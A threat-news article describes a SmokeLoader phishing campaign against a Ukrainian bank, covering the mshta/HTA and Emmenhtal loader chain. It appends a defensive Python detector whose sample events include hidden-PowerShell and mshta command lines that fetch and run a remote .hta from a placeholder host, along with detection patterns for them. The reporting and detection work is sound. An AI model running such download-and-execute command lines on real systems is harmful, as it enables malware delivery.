SmokeLoader targets banking institutions in a new campaign

April 10, 2025

Threat actors have allegedly used the SmokeLoader malware in a recent cybercriminal operation that compromised one of Ukraine's international banks. Reports describe the malware chain used in the campaign as highly complex and technically advanced.

The suspected malware is a well-known and powerful modular loader, reinforced here with covert execution tactics and paired with a lesser-known but increasingly popular intermediary loader dubbed Emmenhtal Loader.

The investigation uncovers an improved infection method that uses multiple malicious tactics, such as social engineering, Living off the Land Binaries and Scripts (LOLBAS), and anti-analysis to silently deploy malware stages without raising alarms.

The alleged SmokeLoader malware attack against a Ukrainian banking institution begins with a phishing email.

According to researchers, the SmokeLoader malware attack starts with a phishing email that impersonates a payment confirmation with an attachment called Платiжна_iнстрyкция.7z.

The study emphasises the attackers' continued use of archive-based evasion techniques. In prior SmokeLoader campaigns, the threat actors leveraged a 7-Zip zero-day vulnerability to bypass security checks by employing double-archived files, which could ultimately allow malware execution.

Although this newly discovered campaign does not leverage the same exploit, it still shows the malware operators’ continued use of archive-based evasion.

Furthermore, the [.]lnk file in the campaign starts a PowerShell script that uses Mshta, a legitimate Windows binary for running HTML applications. It downloads a malicious .hta file and blends into native system operations to bypass detection.

To further obscure the operation, the attackers also adopt a modified DCCW.exe loader, injecting JavaScript into the program to run malicious payloads with a small footprint.

Emmenhtal, the loader stage, is hidden in a specially crafted HTA file that opens with a minimised window and no taskbar entry. JavaScript embedded in the loader calls eval(erc) to run further obfuscated code.

The script then decodes and launches a PowerShell downloader, which looks for two files, invoice1202.pdf and putty1202.exe, and either executes them or downloads fresh copies if they are missing.
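As an added defensive illustration (not code from the original report), the following Python checks Sysmon-style process-creation records for the chain described above: PowerShell launching mshta.exe with a remote .hta, mshta.exe spawning the PowerShell downloader, and the two stage file names. The events, the process IDs and the host placeholder.invalid are constructed sample data.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1), not real telemetry.
# The URL host is a placeholder; the stage file names come from the campaign write-up.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3988, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    # The .lnk opened from Explorer launches a hidden PowerShell that invokes mshta
    {"pid": 4210, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -w hidden -c "mshta http://placeholder.invalid/stage.hta"'},
    {"pid": 4250, "ppid": 4210, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://placeholder.invalid/stage.hta"},
    # The decoded PowerShell downloader checking for the two stage files
    {"pid": 4300, "ppid": 4250,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -ep bypass -c "Test-Path invoice1202.pdf; Start-Process putty1202.exe"'},
    # Benign: a vendor tool opening a local help .hta directly from Explorer
    {"pid": 5000, "ppid": 4120, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},
]

STAGE_FILES = ("invoice1202.pdf", "putty1202.exe")
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_chain(events):
    """Return (pid, rule) pairs for events matching the mshta/PowerShell chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pimg = basename(parent["image"]) if parent else ""
        cmd = e["cmd"].lower()
        if img == "mshta.exe" and REMOTE_HTA.search(e["cmd"]):
            hits.append((e["pid"], "mshta_remote_hta"))  # HTA fetched over HTTP(S)
        if img == "mshta.exe" and pimg == "powershell.exe":
            hits.append((e["pid"], "powershell_spawns_mshta"))  # LOLBAS hand-off
        if img == "powershell.exe" and pimg == "mshta.exe":
            hits.append((e["pid"], "mshta_spawns_powershell"))  # Emmenhtal downloader
        if any(f in cmd for f in STAGE_FILES):
            hits.append((e["pid"], "known_stage_filename"))
    return hits


if __name__ == "__main__":
    for pid, rule in detect_chain(SAMPLE_EVENTS):
        print(pid, rule)
```

The benign local .hta launched from Explorer produces no hit, which is the point of keying on the parent process and the remote URL rather than on mshta.exe alone.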

Finally, the last stage releases SmokeLoader, a flexible malware that can deliver secondary payloads, steal browser and system credentials, inject into legitimate processes, communicate with remote command-and-control (C2) servers, and implement anti-debugging and anti-analysis protections.

This increased use of [.]NET Reactor in current malware stealers shows a slow transition in malware tooling preferences as attackers seek improved evasion using commercial protections.
